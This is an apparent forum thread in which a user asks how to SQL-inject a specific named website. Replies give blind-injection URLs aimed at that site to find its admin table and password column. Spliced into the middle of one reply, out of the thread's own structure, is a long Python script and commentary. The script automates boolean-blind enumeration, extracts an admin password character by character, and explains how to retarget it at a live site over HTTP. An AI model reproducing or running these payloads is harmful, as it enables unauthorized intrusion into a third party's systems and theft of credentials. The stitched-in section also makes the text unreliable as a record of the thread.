Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Can you help me?
Posted by: 0x3a
Date: May 13, 2012 12:44AM

This URL:
http://www.xlsoft.com.cn/Product.asp?id=662

Tools don't work.

order by 27 >> true
order by 28 >> false

When I use UNION SELECT, it doesn't work.

Can you help me?

Thanks!

Re: Can you help me?
Posted by: blackrose
Date: June 01, 2012 12:27PM

Guess on the tables and columns.

Re: Can you help me?
Posted by: 0x3a
Date: June 11, 2012 05:49AM

Blind?

Re: Can you help me?
Posted by: firestorm
Date: September 17, 2012 06:50PM

Hi there, you should keep your options open...

Try blind, like:
----------
Guess table
------------
http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count(*) FROM [user])
Won't load, as user doesn't exist...

http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count(*) FROM [admin])
Loads... admin table is there.

And so on...
-------
Guess column name
--------
http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count([id]) FROM [admin])
TRUE

http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count([password]) FROM [admin])
FALSE

http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count([adminpwd]) FROM [admin])
TRUE

And so on...

Being a pentester, I get to see and use strange things like ColdFusion, Sybase, bla bla... gotta be ready with everything.


Regards

Re: Can you help me?
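The table/column guessing firestorm describes is a boolean-based blind injection: the page either renders (the subquery parsed and ran) or it does not (unknown table or column makes the whole statement error out), and each request answers one yes/no question. The script below is an added example, not code from the thread or from the site in question; it stands the real target in with a constructed in-memory SQLite database and a `page()` function that concatenates the `id` parameter into the query exactly the way a vulnerable `Product.asp` would. It replays firestorm's table and column guesses against that oracle and then goes one step further than the post: once a column is known, it pulls the value out one character at a time with a binary search on each character code. Table and column wordlists, the row contents and the `s3cret` password are all made up for the demo. SQLite is used because it accepts the `[bracketed]` identifiers from the post; on MSSQL the same technique uses `LEN`/`SUBSTRING`/`ASCII` and `TOP 1`, on Access `Len`/`Mid`/`Asc`, and nothing else changes.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the target database (not the real backend):
    one product row and one admin row, with names that firestorm's guesses hit."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Product (id INTEGER, name TEXT);
        INSERT INTO Product VALUES (662, 'Widget');
        CREATE TABLE admin (id INTEGER, adminname TEXT, adminpwd TEXT);
        INSERT INTO admin VALUES (1, 'admin', 's3cret');
    """)
    return con


def make_page(con):
    """Emulates Product.asp?id=...: the parameter is concatenated straight into
    the SQL (the injection point). Returns True when the product page would
    render (at least one row) and False when the query errors or matches
    nothing. That yes/no is the only signal the attacker gets."""
    requests = [0]                       # request counter, for the summary

    def page(id_param):
        requests[0] += 1
        sql = "SELECT * FROM Product WHERE id=" + id_param   # deliberately unsafe
        try:
            return con.execute(sql).fetchone() is not None
        except sqlite3.Error:            # unknown table/column -> error page
            return False

    return page, requests


def guess_tables(page, base_id, candidates):
    """firestorm's table guess: the subquery only runs if the table exists."""
    return [t for t in candidates
            if page(f"{base_id} and 0<=(SELECT count(*) FROM [{t}])")]


def guess_columns(page, base_id, table, candidates):
    """firestorm's column guess: count([col]) errors out on an unknown column."""
    return [c for c in candidates
            if page(f"{base_id} and 0<=(SELECT count([{c}]) FROM [{table}])")]


def _bsearch(oracle, lo, hi):
    """Smallest v in [lo, hi] for which oracle(v) ('secret <= v') is true."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(mid):
            hi = mid
        else:
            lo = mid + 1
    return lo


def extract_value(page, base_id, table, column, max_len=64):
    """Beyond the post: read the first row's value of [table].[column]
    character by character, ~7 requests per character via binary search."""
    sub = f"(SELECT [{column}] FROM [{table}] LIMIT 1)"     # TOP 1 on MSSQL/Access
    length = _bsearch(lambda n: page(f"{base_id} and length({sub})<={n}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = _bsearch(
            lambda v: page(f"{base_id} and unicode(substr({sub},{pos},1))<={v}"),
            0, 127)
        chars.append(chr(code))
    return "".join(chars)


def run_enumeration():
    """Full blind run against the constructed target; returns the findings."""
    page, requests = make_page(build_db())
    base_id = "662"
    # Sanity check the oracle first: a true and a false condition must differ.
    assert page(f"{base_id} and 1=1") and not page(f"{base_id} and 1=0")
    tables = guess_tables(page, base_id,
                          ["user", "users", "Product", "admin", "member", "config"])
    columns = guess_columns(page, base_id, "admin",
                            ["id", "username", "password", "adminname", "adminpwd"])
    secret = extract_value(page, base_id, "admin", "adminpwd")
    return {"tables": tables, "columns": columns,
            "adminpwd": secret, "requests": requests[0]}


if __name__ == "__main__":
    result = run_enumeration()
    for key, value in result.items():
        print(f"{key}: {value}")
```

The same loop structure drives a real target by replacing `page()` with an HTTP GET that checks for a marker string from the product page (a title or a product name) rather than an HTTP status, since an error handler may still return 200. The sanity check at the top of `run_enumeration()` is worth keeping in any such script: if `and 1=1` and `and 1=0` render the same page, the parameter is not injectable in this way and every later "answer" is noise.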
Posted by: 0x3a
Date: October 30, 2012 10:42AM

Thanks
